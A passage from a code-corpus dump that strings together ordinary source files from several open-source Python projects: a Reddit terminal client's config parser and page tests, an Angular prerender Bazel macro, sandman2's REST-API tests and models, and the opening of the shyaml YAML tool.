"""
Load settings from an rtv configuration file.
"""
if filename is None:
filename = CONFIG
config = configparser.ConfigParser()
if os.path.exists(filename):
with codecs.open(filename, encoding='utf-8') as fp:
config.readfp(fp)
return cls._parse_rtv_file(config)
@staticmethod
def _parse_rtv_file(config):
rtv = {}
if config.has_section('rtv'):
rtv = dict(config.items('rtv'))
params = {
'ascii': partial(config.getboolean, 'rtv'),
'monochrome': partial(config.getboolean, 'rtv'),
'persistent': partial(config.getboolean, 'rtv'),
'autologin': partial(config.getboolean, 'rtv'),
'clear_auth': partial(config.getboolean, 'rtv'),
'enable_media': partial(config.getboolean, 'rtv'),
'history_size': partial(config.getint, 'rtv'),
'oauth_redirect_port': partial(config.getint, 'rtv'),
'oauth_scope': lambda x: rtv[x].split(','),
'max_comment_cols': partial(config.getint, 'rtv'),
'hide_username': partial(config.getboolean, 'rtv'),
'flash': partial(config.getboolean, 'rtv')
}
for key, func in params.items():
if key in rtv:
rtv[key] = func(key)
bindings = {}
if config.has_section('bindings'):
bindings = dict(config.items('bindings'))
for name, keys in bindings.items():
bindings[name] = [key.strip() for key in keys.split(',')]
return rtv, bindings
@staticmethod
def _ensure_filepath(filename):
"""
Ensure that the directory exists before trying to write to the file.
"""
filepath = os.path.dirname(filename)
if not os.path.exists(filepath):
os.makedirs(filepath)
```
#### File: rtv/tests/test_subreddit.py
```python
from __future__ import unicode_literals
import curses
import six
import pytest
from rtv import __version__
from rtv.subreddit_page import SubredditPage
from rtv.packages.praw.errors import NotFound, HTTPException
from requests.exceptions import ReadTimeout
try:
from unittest import mock
except ImportError:
import mock
def test_subreddit_page_construct(reddit, terminal, config, oauth):
window = terminal.stdscr.subwin
with terminal.loader():
page = SubredditPage(reddit, terminal, config, oauth, '/r/python')
assert terminal.loader.exception is None
page.draw()
# Title
title = '/r/python'.encode('utf-8')
window.addstr.assert_any_call(0, 0, title)
# Banner
menu = '[1]hot [2]top [3]rising [4]new [5]controversial [6]gilded'.encode('utf-8')
window.addstr.assert_any_call(0, 0, menu)
# Submission
text = page.content.get(0)['split_title'][0].encode('utf-8')
window.subwin.addstr.assert_any_call(0, 1, text, 2097152)
# Cursor should have been drawn
window.subwin.addch.assert_any_call(0, 0, ' ', curses.A_REVERSE)
# Reload with a smaller terminal window
terminal.stdscr.ncols = 20
terminal.stdscr.nlines = 10
with terminal.loader():
page = SubredditPage(reddit, terminal, config, oauth, '/r/python')
assert terminal.loader.exception is None
page.draw()
def test_subreddit_refresh(subreddit_page, terminal):
# Refresh the page with default values
subreddit_page.controller.trigger('r')
assert subreddit_page.content.order is None
assert subreddit_page.content.name == '/r/python'
assert terminal.loader.exception is None
# Refresh with the order in the name
subreddit_page.refresh_content(order='ignore', name='/r/front/hot')
assert subreddit_page.content.order == 'hot'
assert subreddit_page.content.name == '/r/front'
assert terminal.loader.exception is None
def test_subreddit_reload_page(subreddit_page, terminal, reddit):
cache = reddit.handler.cache
assert len(cache) == 1
# A plain refresh_content() will use whatever is in the praw cache
# instead of making a new request to reddit
list(cache.values())[0].status_code = 503
subreddit_page.refresh_content()
assert isinstance(terminal.loader.exception, HTTPException)
cache = reddit.handler.cache
assert len(cache) == 1
# But if we manually trigger a page refresh, it should clear the cache
# and reload the page instead of returning the cached 503 response
list(cache.values())[0].status_code = 503
subreddit_page.controller.trigger('r')
assert terminal.loader.exception is None
def test_subreddit_title(subreddit_page, terminal, capsys):
subreddit_page.content.name = 'hello ❤'
with mock.patch.dict('os.environ', {'DISPLAY': ':1'}):
terminal.config['ascii'] = True
subreddit_page.draw()
out, _ = capsys.readouterr()
assert isinstance(out, six.text_type)
assert out == '\x1b]2;hello ? - rtv {}\x07'.format(__version__)
terminal.config['ascii'] = False
subreddit_page.draw()
out, _ = capsys.readouterr()
assert isinstance(out, six.text_type)
assert out == '\x1b]2;hello ❤ - rtv {}\x07'.format(__version__)
with mock.patch.dict('os.environ', {'DISPLAY': ''}):
subreddit_page.draw()
out, _ = capsys.readouterr()
assert not out
with mock.patch.dict('os.environ', {'INSIDE_EMACS': '25.3.1,term:0.96'}):
subreddit_page.draw()
out, _ = capsys.readouterr()
assert not out
def test_subreddit_search(subreddit_page, terminal):
window = terminal.stdscr.subwin
# Search the current subreddit
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = 'search term'
subreddit_page.controller.trigger('f')
assert subreddit_page.content.name == '/r/python'
assert terminal.prompt_input.called
assert not terminal.loader.exception
# The page title should display the query
subreddit_page.draw()
title = 'Searching /r/python: search term'.encode('utf-8')
window.addstr.assert_any_call(0, 0, title)
# Ordering the results should preserve the query
window.addstr.reset_mock()
subreddit_page.refresh_content(order='hot')
subreddit_page.refresh_content(order='top-all')
subreddit_page.refresh_content(order='new')
assert subreddit_page.content.name == '/r/python'
assert subreddit_page.content.query == 'search term'
assert not terminal.loader.exception
# Searching with an empty query shouldn't crash
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = None
subreddit_page.controller.trigger('f')
assert not terminal.loader.exception
# Changing to a new subreddit should clear the query
window.addstr.reset_mock()
subreddit_page.refresh_content(name='/r/learnpython')
assert subreddit_page.content.query is None
def test_subreddit_prompt(subreddit_page, terminal):
# Prompt for a different subreddit
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = 'front/top'
subreddit_page.controller.trigger('/')
assert subreddit_page.content.name == '/r/front'
assert subreddit_page.content.order == 'top'
assert not terminal.loader.exception
def test_subreddit_prompt_submission(subreddit_page, terminal):
prompts = [
'comments/571dw3',
'///comments/571dw3',
'/comments/571dw3',
'/r/pics/comments/571dw3/',
'https://www.reddit.com/r/pics/comments/571dw3/at_disneyland']
url = 'https://www.reddit.com/comments/571dw3'
for text in prompts:
with mock.patch.object(subreddit_page, 'open_submission'), \
mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = text
subreddit_page.controller.trigger('/')
subreddit_page.open_submission.assert_called_with(url)
assert not terminal.loader.exception
def test_subreddit_prompt_submission_invalid(subreddit_page, terminal):
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = 'comments/571dw3fakeid'
subreddit_page.controller.trigger('/')
assert isinstance(terminal.loader.exception, NotFound)
def test_subreddit_order(subreddit_page):
# /r/python doesn't always have rising submissions, so use a larger sub
subreddit_page.refresh_content(name='all')
subreddit_page.content.query = ''
subreddit_page.controller.trigger('1')
assert subreddit_page.content.order == 'hot'
subreddit_page.controller.trigger('3')
assert subreddit_page.content.order == 'rising'
subreddit_page.controller.trigger('4')
assert subreddit_page.content.order == 'new'
subreddit_page.controller.trigger('6')
assert subreddit_page.content.order == 'gilded'
subreddit_page.content.query = 'search text'
subreddit_page.controller.trigger('1')
assert subreddit_page.content.order == 'relevance'
subreddit_page.controller.trigger('4')
assert subreddit_page.content.order == 'new'
# Shouldn't be able to sort queries by gilded
subreddit_page.controller.trigger('6')
assert curses.flash.called
assert subreddit_page.content.order == 'new'
def test_subreddit_order_top(subreddit_page, terminal):
# Sort by top
with mock.patch.object(terminal, 'show_notification'):
# Invalid selection
terminal.show_notification.return_value = ord('x')
subreddit_page.controller.trigger('2')
terminal.show_notification.assert_called_with('Invalid option')
assert subreddit_page.content.order is None
# Valid selection - sort by week
terminal.show_notification.reset_mock()
terminal.show_notification.return_value = ord('3')
subreddit_page.controller.trigger('2')
assert subreddit_page.content.order == 'top-week'
def test_subreddit_order_controversial(subreddit_page, terminal):
# Sort by controversial
with mock.patch.object(terminal, 'show_notification'):
# Invalid selection
terminal.show_notification.return_value = ord('x')
subreddit_page.controller.trigger('5')
terminal.show_notification.assert_called_with('Invalid option')
assert subreddit_page.content.order is None
# Valid selection - sort by default
terminal.show_notification.reset_mock()
terminal.show_notification.return_value = ord('\n')
subreddit_page.controller.trigger('5')
assert subreddit_page.content.order == 'controversial'
def test_subreddit_order_search(subreddit_page, terminal):
# Search the current subreddit
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = 'search term'
subreddit_page.controller.trigger('f')
assert subreddit_page.content.name == '/r/python'
assert terminal.prompt_input.called
assert not terminal.loader.exception
# Sort by relevance
subreddit_page.controller.trigger('1')
assert subreddit_page.content.order == 'relevance'
# Sort by top
with mock.patch.object(terminal, 'show_notification'):
terminal.show_notification.reset_mock()
terminal.show_notification.return_value = ord('6')
subreddit_page.controller.trigger('2')
assert subreddit_page.content.order == 'top-all'
# Sort by comments
with mock.patch.object(terminal, 'show_notification'):
terminal.show_notification.reset_mock()
terminal.show_notification.return_value = ord('6')
subreddit_page.controller.trigger('3')
assert subreddit_page.content.order == 'comments-all'
# Sort by new
subreddit_page.controller.trigger('4')
assert subreddit_page.content.order == 'new'
def test_subreddit_open(subreddit_page, terminal, config):
# Open the selected submission
data = subreddit_page.content.get(subreddit_page.nav.absolute_index)
with mock.patch('rtv.submission_page.SubmissionPage.loop') as loop, \
mock.patch.object(config.history, 'add'):
data['url_type'] = 'selfpost'
subreddit_page.controller.trigger('l')
assert not terminal.loader.exception
assert loop.called
config.history.add.assert_called_with(data['url_full'])
# Open the selected link externally
data = subreddit_page.content.get(subreddit_page.nav.absolute_index)
with mock.patch.object(terminal, 'open_link'), \
mock.patch.object(config.history, 'add'):
data['url_type'] = 'external'
subreddit_page.controller.trigger('o')
assert terminal.open_link.called
config.history.add.assert_called_with(data['url_full'])
# Open the selected link within rtv
data = subreddit_page.content.get(subreddit_page.nav.absolute_index)
with mock.patch.object(subreddit_page, 'open_submission'), \
mock.patch.object(config.history, 'add'):
data['url_type'] = 'selfpost'
subreddit_page.controller.trigger('o')
assert subreddit_page.open_submission.called
def test_subreddit_open_xpost(subreddit_page, config):
data = subreddit_page.content.get(subreddit_page.nav.absolute_index)
# Open an x-post subreddit, see /r/TinySubredditoftheDay for an example
with mock.patch.object(subreddit_page, 'refresh_content'):
data['url_type'] = 'x-post subreddit'
data['xpost_subreddit'] = 'goodbye'
subreddit_page.controller.trigger('o')
subreddit_page.refresh_content.assert_called_with(
name='goodbye', order='ignore')
# Open an x-post submission, see /r/bestof for an example
with mock.patch.object(subreddit_page, 'open_submission'):
data['url_type'] = 'x-post submission'
data['url_full'] = 'www.test.com'
subreddit_page.controller.trigger('o')
subreddit_page.open_submission.assert_called_with(url='www.test.com')
def test_subreddit_unauthenticated(subreddit_page, terminal):
# Unauthenticated commands
methods = [
'a', # Upvote
'z', # Downvote
'c', # Post
'e', # Edit
'd', # Delete
's', # Subscriptions
]
for ch in methods:
subreddit_page.controller.trigger(ch)
text = 'Not logged in'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_called_with(1, 1, text)
def test_subreddit_post(subreddit_page, terminal, reddit, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# Post a submission to an invalid subreddit
subreddit_page.refresh_content(name='front')
subreddit_page.controller.trigger('c')
text = "Can't post to /r/front".encode('utf-8')
terminal.stdscr.subwin.addstr.assert_called_with(1, 1, text)
# Post a submission with a title but with no body
subreddit_page.refresh_content(name='python')
with mock.patch.object(terminal, 'open_editor'):
terminal.open_editor.return_value.__enter__.return_value = 'title'
subreddit_page.controller.trigger('c')
text = 'Missing body'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_called_with(1, 1, text)
# Post a fake submission
url = 'https://www.reddit.com/r/Python/comments/2xmo63/'
submission = reddit.get_submission(url)
with mock.patch.object(terminal, 'open_editor'), \
mock.patch.object(reddit, 'submit'), \
mock.patch('rtv.page.Page.loop') as loop, \
mock.patch('time.sleep'):
terminal.open_editor.return_value.__enter__.return_value = 'test\ncont'
reddit.submit.return_value = submission
subreddit_page.controller.trigger('c')
assert reddit.submit.called
assert loop.called
def test_subreddit_open_subscriptions(subreddit_page, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# Open subscriptions
with mock.patch('rtv.page.Page.loop') as loop:
subreddit_page.controller.trigger('s')
assert loop.called
def test_subreddit_get_inbox_timeout(subreddit_page, refresh_token, terminal, vcr):
if vcr.record_mode == 'none':
pytest.skip('Unable to test ReadTimeout exceptions using a cassette')
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
subreddit_page.reddit.config.timeout = 0.00000001
subreddit_page.controller.trigger('i')
text = 'HTTP request timed out'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_called_with(1, 1, text)
assert isinstance(terminal.loader.exception, ReadTimeout)
def test_subreddit_open_multireddits(subreddit_page, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# Open multireddits
with mock.patch('rtv.page.Page.loop') as loop:
subreddit_page.controller.trigger('S')
assert loop.called
def test_subreddit_private_user_pages(subreddit_page, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
subreddit_page.refresh_content(name='/u/me/saved')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/hidden')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/upvoted')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/downvoted')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/overview')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/submitted')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/comments')
subreddit_page.draw()
def test_subreddit_user_pages(subreddit_page, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# Pick a user that has a lot of recent comments, so we can make sure that
# SavedComment objects have all of the properties necessary to be drawn
# on the submission page.
# Should default to the overview page
subreddit_page.refresh_content(name='/u/spez')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/spez/overview')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/spez/submitted')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/spez/comments')
subreddit_page.draw()
def test_subreddit_draw_header(subreddit_page, refresh_token, terminal):
# /r/front alias should be renamed in the header
subreddit_page.refresh_content(name='/r/front')
subreddit_page.draw()
text = 'Front Page'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
subreddit_page.refresh_content(name='/r/front/new')
subreddit_page.draw()
text = 'Front Page'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
# Log in to check the user submissions page
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# /u/me alias should be renamed in the header
subreddit_page.refresh_content(name='/u/me')
subreddit_page.draw()
text = 'My Overview'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
subreddit_page.refresh_content(name='/u/me/new')
subreddit_page.draw()
text = 'My Overview'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
# /u/saved alias should be renamed in the header
subreddit_page.refresh_content(name='/u/me/saved')
subreddit_page.draw()
text = 'My Saved Content'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
# /u/upvoted alias should be renamed in the header
subreddit_page.refresh_content(name='/u/me/upvoted')
subreddit_page.draw()
text = 'My Upvoted Content'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
# /u/downvoted alias should be renamed in the header
subreddit_page.refresh_content(name='/u/me/downvoted')
subreddit_page.draw()
text = 'My Downvoted Content'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
# /u/hidden alias should be renamed in the header
subreddit_page.refresh_content(name='/u/me/hidden')
subreddit_page.draw()
text = 'My Hidden Content'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
def test_subreddit_frontpage_toggle(subreddit_page, terminal):
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = 'aww'
subreddit_page.controller.trigger('/')
assert subreddit_page.content.name == '/r/aww'
subreddit_page.controller.trigger('p')
assert subreddit_page.content.name == '/r/front'
def test_subreddit_hide_submission(subreddit_page, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# The api won't return hidden posts in the submission listing, so the
# first post should always have hidden set to false
data = subreddit_page.get_selected_item()
assert data['hidden'] is False
# Hide the first submission by pressing the space key
subreddit_page.controller.trigger(0x20)
assert subreddit_page.term.loader.exception is None
data = subreddit_page.get_selected_item()
assert data['hidden'] is True
# Make sure that the status was actually updated on the server side
data['object'].refresh()
assert data['object'].hidden is True
# Now undo the hide by pressing space again
subreddit_page.controller.trigger(0x20)
assert subreddit_page.term.loader.exception is None
data = subreddit_page.get_selected_item()
assert data['hidden'] is False
# Make sure that the status was actually updated on the server side
data['object'].refresh()
assert data['object'].hidden is False
``` |
{
"source": "0xflotus/rules_nodejs",
"score": 2
} |
#### File: angular/tools/angular_prerender.bzl
```python
load("@build_bazel_rules_nodejs//:index.bzl", _nodejs_binary = "nodejs_binary", _nodejs_test = "nodejs_test")
load("@npm//@bazel/typescript:index.bzl", _ts_library = "ts_library")
def _get_output_path(route, root_at):
return root_at + "/" + route + "/index.html"
def ng_prerender(name, index, prerender_roots = [], **kwargs):
"""
Helper macro for prerendering Angular routes to index files as part of the build
The outputs of this macro are:
%name% - all the rendered roots, plus the root route /
%name%.root - an alias referencing just the root index file
%name%.%route% - an alias referencing each rendered route, with / replaced by underscores
Args:
name: Rule name for the main output genrule
index: Label for the production index.html file with which to render into
prerender_roots: A list of roots that will be prerendered as part of this macro, the root route / is always rendered
"""
renderer_lib = "%s_renderer_lib" % name
_ts_library(
name = renderer_lib,
srcs = ["//src:prerender.ts"],
deps = [
"//src/app:app_server",
"@npm//@angular/platform-server",
"@npm//zone.js",
"@npm//domino",
"@npm//reflect-metadata",
"@npm//@types/node",
],
)
bin = "%s_bin" % renderer_lib
_nodejs_binary(
name = bin,
data = [
":%s" % renderer_lib,
"@npm//@angular/platform-server",
"@npm//zone.js",
"@npm//domino",
"@npm//reflect-metadata",
],
install_source_map_support = False,
entry_point = "//src:prerender.ts",
)
root_at = "_prerender/" + native.package_name()
# we can't output "foo/index.html" since that collides with source files and will likely cross a package boundary
# so we output "_prerender/pkg_name/route/index.html"
prerender_root_outs = [_get_output_path(route, root_at) for route in prerender_roots]
root_index = "%s/index.html" % root_at
visibility = kwargs.pop("visibility", [])
native.genrule(
name = name,
srcs = [index],
outs = [root_index] + prerender_root_outs,
cmd = "$(location :%s) --index $(location %s) --outs $(OUTS) --routes / %s" % (bin, index, " ".join(prerender_roots)),
tools = [":%s" % bin],
message = "Prerendering Angular",
visibility = visibility,
tags = kwargs.pop("tags", []),
)
# convenience "output groups" from macro
native.alias(
name = "%s.root" % name,
actual = root_index,
visibility = visibility,
)
[
native.alias(
name = "%s.%s" % (name, route.replace("/", "_")),
actual = _get_output_path(route, root_at),
visibility = visibility,
)
for route in prerender_roots
]
def ng_prerender_test(name, index, route, expected_elements = [], **kwargs):
"""
Simple smoke test for a prerendered index file, as generated by ng_prerender
Args:
name: Rule name for the test
index: Label of the index file under test
route: The route that this index file belongs to
expected_elements: An optional array of expected elements that should appear in the index file
"""
_ts_library(
name = "%s_render_spec" % name,
srcs = ["//src:prerender-spec.ts"],
deps = [
"@npm//@types/node",
],
testonly = 1,
)
_nodejs_test(
name = name,
data = [
":%s_render_spec" % name,
index,
],
templated_args = ["--index $(location %s)" % index, "--route %s" % route, "--expected %s" % (" ".join(expected_elements))],
entry_point = "//src:prerender-spec.ts",
tags = kwargs.pop("tags", []),
)
``` |
{
"source": "0xflotus/sandman2",
"score": 2
} |
#### File: 0xflotus/sandman2/run.py
```python
from sandman2 import get_app
app = get_app('sqlite+pysqlite:///tests/data/db.sqlite3')
def main():
app.run(debug=True)
if __name__ == '__main__':
main()
```
#### File: sandman2/tests/conftest.py
```python
import os
import importlib
import inspect
import shutil
import sys
sys.path.insert(0, os.path.abspath('.'))
import pytest
from sandman2 import get_app, db
@pytest.yield_fixture(scope='function')
def app(request):
"""Yield the application instance."""
database = getattr(request.module, 'database', 'db.sqlite3')
read_only = getattr(request.module, 'read_only', False)
exclude_tables = getattr(request.module, 'exclude_tables', None)
test_database_path = os.path.join('tests', 'data', 'test_db.sqlite3')
pristine_database_path = os.path.join('tests', 'data', database)
shutil.copy(pristine_database_path, test_database_path)
model_module = getattr(request.module, 'model_module', None)
user_models = []
if model_module:
module = importlib.import_module(model_module)
for name, obj in inspect.getmembers(module):
if inspect.isclass(obj):
if name not in ('Model', 'AutomapModel'):
user_models.append(obj)
application = get_app(
'sqlite+pysqlite:///{}'.format(
test_database_path),
user_models=user_models,
exclude_tables=exclude_tables,
read_only=read_only)
application.testing = True
yield application
with application.app_context():
db.session.remove()
db.drop_all()
os.unlink(test_database_path)
```
#### File: sandman2/tests/test_user_models.py
```python
import json
from pytest_flask.fixtures import client
from tests.resources import (
GET_ERROR_MESSAGE,
INVALID_ACTION_MESSAGE,
)
model_module = 'tests.user_models'
database = 'blog.sqlite3'
def test_validate_get(client):
"""Do we get back an error message when making a GET request that fails
validation?"""
response = client.get('/user/')
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_get_single_resource(client):
"""Do we get back an error message when making a GET request for a
single resource which fails validation ?"""
response = client.get('/user/1')
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_get_datetime(client):
"""Do we get back a properly formatted datetime on a model that defines one?"""
response = client.get('/post/1.0')
assert response.status_code == 200
assert response.json['posted_at'] is not None
def test_validate_post(client):
"""Do we get back an error message when making a POST request that fails
validation?"""
response = client.post(
'/user/',
data=json.dumps({
'name': '<NAME>',
'email': '<EMAIL>',
}),
headers={'Content-Type': 'application/json'}
)
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_post_existing_resource(client):
"""Do we get back an error message when making a POST request on a resource that already exists?"""
response = client.post(
'/user/',
data=json.dumps({
'name': '<NAME>',
'email': '<EMAIL>',
}),
headers={'Content-Type': 'application/json'}
)
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_put_existing(client):
"""Do we get back an error message when making a PUT request for
an exisitng resource?"""
response = client.put(
'/user/1',
data=json.dumps({
'name': '<NAME>',
'email': '<EMAIL>',
}),
headers={'Content-Type': 'application/json'}
)
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_put_new(client):
"""Do we get back an error message when making a PUT request for a
totally new resource?"""
response = client.put(
'/user/2',
data=json.dumps({
'name': '<NAME>',
'email': '<EMAIL>',
}),
headers={'Content-Type': 'application/json'}
)
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_patch(client):
"""Do we get back an error message when making a PATCH request on an
existing resource?"""
response = client.patch(
'/user/1',
data=json.dumps({
'name': '<NAME>',
}),
headers={'Content-Type': 'application/json'}
)
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_delete(client):
"""Do we get back an error message when making a DELETE request that fails
validation?"""
response = client.delete('/user/1')
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
```
#### File: sandman2/tests/user_models.py
```python
import datetime
from sandman2.model import db, Model
from tests.resources import (
GET_ERROR_MESSAGE,
INVALID_ACTION_MESSAGE,
)
class User(db.Model, Model):
"""A user of the blogging application."""
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
email = db.Column(db.String, unique=True)
@staticmethod
def is_valid_get(request, resource):
"""Return error message in all cases (just for testing)."""
return INVALID_ACTION_MESSAGE
@staticmethod
def is_valid_post(request, resource):
"""Return error message in all cases (just for testing)."""
return INVALID_ACTION_MESSAGE
@staticmethod
def is_valid_patch(request, resource):
"""Return error message in all cases (just for testing)."""
return INVALID_ACTION_MESSAGE
@staticmethod
def is_valid_put(request, resource):
"""Return error message in all cases (just for testing)."""
return INVALID_ACTION_MESSAGE
@staticmethod
def is_valid_delete(request, resource):
"""Return error message in all cases (just for testing)."""
return INVALID_ACTION_MESSAGE
class Blog(db.Model, Model):
"""An online weblog."""
__tablename__ = 'blog'
id = db.Column(db.String, primary_key=True)
name = db.Column(db.String)
subheader = db.Column(db.String, nullable=True)
creator_id = db.Column(db.Integer, db.ForeignKey('user.id'))
creator = db.relationship(User)
class Post(db.Model, Model):
"""An individual blog post."""
__tablename__ = 'post'
id = db.Column(db.Numeric, primary_key=True)
title = db.Column(db.String)
content = db.Column(db.String)
posted_at = db.Column(db.DateTime, default=datetime.datetime.now)
author_id = db.Column(db.Integer, db.ForeignKey('user.id'))
author = db.relationship(User)
``` |
{
"source": "0xflotus/shyaml",
"score": 2
} |
#### File: 0xflotus/shyaml/shyaml.py
```python
from __future__ import print_function
import sys
import os.path
import re
import textwrap
import yaml
__version__ = "%%version%%" ## gets filled at release time by ./autogen.sh
__with_libyaml__ = False
if not os.environ.get("FORCE_PYTHON_YAML_IMPLEMENTATION"):
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
__with_libyaml__ = True
except ImportError: ## pragma: no cover
pass
if not __with_libyaml__:
from yaml import SafeLoader, SafeDumper ## noqa: F811
__with_libyaml__ = False
PY3 = sys.version_info[0] >= 3
WIN32 = sys.platform == 'win32'
EXNAME = os.path.basename(__file__ if WIN32 else sys.argv[0])
for ext in (".py", ".pyc", ".exe", "-script.py", "-script.pyc"): ## pragma: no cover
if EXNAME.endswith(ext): ## pragma: no cover
EXNAME = EXNAME[:-len(ext)]
break
USAGE = """\
Usage:
%(exname)s {-h|--help}
%(exname)s {-V|--version}
%(exname)s [-y|--yaml] ACTION KEY [DEFAULT]
""" % {"exname": EXNAME}
HELP = """
Parses and output chosen subpart or values from YAML input.
It reads YAML in stdin and will output on stdout it's return value.
%(usage)s
Options:
-y, --yaml
Output only YAML safe value, more precisely, even
literal values will be YAML quoted. This behavior
is required if you want to output YAML subparts and
further process it. If you know you have are dealing
with safe literal value, then you don't need this.
(Default: no safe YAML output)
ACTION Depending on the type of data you've targetted
thanks to the KEY, ACTION can be:
These ACTIONs applies to any YAML type:
get-type ## returns a short string
get-value ## returns YAML
These ACTIONs applies to 'sequence' and 'struct' YAML type:
get-values{,-0} ## returns list of YAML
get-length ## returns an integer
These ACTION applies to 'struct' YAML type:
keys{,-0} ## returns list of YAML
values{,-0} ## returns list of YAML
key-values,{,-0} ## returns list of YAML
Note that any value returned is returned on stdout, and
when returning ``list of YAML``, it'll be separated by
a newline or ``NUL`` char depending of you've used the
``-0`` suffixed ACTION.
KEY Identifier to browse and target subvalues into YAML
structure. Use ``.`` to parse a subvalue. If you need
to use a literal ``.`` or ``\\``, use ``\\`` to quote it.
Use struct keyword to browse ``struct`` YAML data and use
integers to browse ``sequence`` YAML data.
DEFAULT if not provided and given KEY do not match any value in
the provided YAML, then DEFAULT will be returned. If no
default is provided and the KEY do not match any value
in the provided YAML, %(exname)s will fail with an error
message.
Examples:
## get last grocery
cat recipe.yaml | %(exname)s get-value groceries.-1
## get all words of my french dictionary
cat dictionaries.yaml | %(exname)s keys-0 french.dictionary
## get YAML config part of 'myhost'
cat hosts_config.yaml | %(exname)s get-value cfgs.myhost
""" % {"exname": EXNAME, "usage": USAGE}
class ShyamlSafeLoader(SafeLoader):
"""Shyaml specific safe loader"""
class ShyamlSafeDumper(SafeDumper):
"""Shyaml specific safe dumper"""
## Ugly way to force both the Cython code and the normal code
## to get the output line by line.
class ForcedLineStream(object):
def __init__(self, fileobj):
self._file = fileobj
def read(self, size=-1):
## don't care about size
return self._file.readline()
def close(self):
## XXXvlab: for some reason, ``.close(..)`` doesn't seem to
## be used by any code. I'll keep this to avoid any bad surprise.
return self._file.close() ## pragma: no cover
class LineLoader(ShyamlSafeLoader):
"""Forcing stream in line buffer mode"""
def __init__(self, stream):
stream = ForcedLineStream(stream)
super(LineLoader, self).__init__(stream)
##
## Keep previous order in YAML
##
try:
## included in standard lib from Python 2.7
from collections import OrderedDict
except ImportError: ## pragma: no cover
## try importing the backported drop-in replacement
## it's available on PyPI
from ordereddict import OrderedDict
## Ensure that there are no collision with legacy OrderedDict
## that could be used for omap for instance.
class MyOrderedDict(OrderedDict):
pass
ShyamlSafeDumper.add_representer(
MyOrderedDict,
lambda cls, data: cls.represent_dict(data.items()))
def construct_omap(cls, node):
## Force unfolding reference and merges
## otherwise it would fail on 'merge'
cls.flatten_mapping(node)
return MyOrderedDict(cls.construct_pairs(node))
ShyamlSafeLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
construct_omap)
##
## Support local and global objects
##
class EncapsulatedNode(object):
"""Holds a yaml node"""
def mk_encapsulated_node(s, node):
method = "construct_%s" % (node.id, )
data = getattr(s, method)(node)
class _E(data.__class__, EncapsulatedNode):
pass
_E.__name__ = str(node.tag)
_E._node = node
return _E(data)
def represent_encapsulated_node(s, o):
value = s.represent_data(o.__class__.__bases__[0](o))
value.tag = o.__class__.__name__
return value
ShyamlSafeDumper.add_multi_representer(EncapsulatedNode,
represent_encapsulated_node)
ShyamlSafeLoader.add_constructor(None, mk_encapsulated_node)
##
## Key specifier
##
def tokenize(s):
r"""Returns an iterable through all subparts of string splitted by '.'
So:
>>> list(tokenize('foo.bar.wiz'))
['foo', 'bar', 'wiz']
Contrary to traditional ``.split()`` method, this function has to
deal with any type of data in the string. So it actually
interprets the string. Characters with meaning are '.' and '\'.
Both of these can be included in a token by quoting them with '\'.
So dot of slashes can be contained in token:
>>> print('\n'.join(tokenize(r'foo.dot<\.>.slash<\\>')))
foo
dot<.>
slash<\>
Notice that empty keys are also supported:
>>> list(tokenize(r'foo..bar'))
['foo', '', 'bar']
Given an empty string:
>>> list(tokenize(r''))
['']
And a None value:
>>> list(tokenize(None))
[]
"""
if s is None:
return
